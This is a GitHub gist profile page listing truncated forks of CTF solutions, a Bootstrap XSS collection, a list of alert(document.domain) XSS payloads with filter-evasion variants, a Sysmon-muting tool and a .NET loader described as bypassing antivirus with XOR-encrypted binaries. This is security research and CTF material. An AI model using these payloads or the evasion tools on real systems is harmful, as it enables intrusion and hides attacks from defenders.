Skip to content

Instantly share code, notes, and snippets.

View deltaclock's full-sized avatar

Nick deltaclock

View GitHub Profile
@deltaclock
deltaclock / aCSAW-21.md
Created September 12, 2021 22:44 — forked from Az3z3l/aCSAW-21.md
Solutions for all Web challenges from CSAW-21

Solutions for all Web challenges from CSAW-21

@deltaclock
deltaclock / solve.py
Created June 20, 2021 17:19 — forked from st98/solve.py
Midnight Sun CTF 2021 Quals - fsociety
import paramiko
from pwn import *
context.log_level = 'error'
def check(password):
try:
conn = ssh(host='fsociety-04.play.midnightsunctf.se', port=2222, user='elliot', password=password)
conn.close()
return True
@deltaclock
deltaclock / index.html
Created May 30, 2021 16:45 — forked from lbherrera/index.html
Solution for the MessageKeeper challenge from Pwn2Win 2021
<!DOCTYPE html>
<html>
<head>
<title>Pwn2Win | MessageKeeper</title>
</head>
<body>
<script>
let alphabet = "0123456789abcdef";
const sleep = (ms) => {
-
.
..
...
....
.AMRU
.json
.onion
.txt
0
@deltaclock
deltaclock / cairo.ts
Created April 26, 2021 13:28 — forked from bluepichu/cairo.ts
PlaidCTF 2021 Carmen Sandiego solutions
import express from "express";
import { Socket } from "net";
import { PromiseSocket } from "promise-socket";
import morgan from "morgan";
const { TARGET_IP, SENSOR_PORT, SENSOR_TOKEN } = process.env;
const packetSize = 1448;
const SELF = "whatevermyipis:12345";
const TARGET = "iot.hub";
@deltaclock
deltaclock / Bootstrap_XSS.md
Created March 28, 2021 01:22 — forked from BlackFan/Bootstrap_XSS.md
Bootstrap XSS Collection

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

➖ Requires user interaction

➖ Requires $('[data-toggle="tooltip"]').tooltip();

@deltaclock
deltaclock / alert.js
Created March 17, 2021 13:02 — forked from tomnomnom/alert.js
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;
namespace MuteSysmon
{
class Program
@deltaclock
deltaclock / scriptless_solve.html
Created June 13, 2020 19:30 — forked from terjanq/scriptless_solve.html
Solution to Scriptless challenge from Pwn2win 2020 CTF
<body>
</body>
<script>
/*
Quasi-scriptless (3 solves)
@deltaclock
deltaclock / NetLoader.cs
Created June 8, 2020 14:20 — forked from Arno0x/NetLoader.cs
Partial rewrite of @Flangvik NetLoader. Supports proxy with authentication, XOR encrypted binaries, multiple arguments passing to binary.
/*
Author: Arno0x0x, Twitter: @Arno0x0x
Completely based on @Flangvik netloader
This partial rewrite of @Flangvik Netloader includes the following changes:
- Allow loading of an XOR encrypted binary to bypass antiviruses
To encrypt the initial binary you can use my Python transformFile.py script.
Example: ./transformFile.py -e xor -k mightyduck -i Rubeus.bin -o Rubeus.xor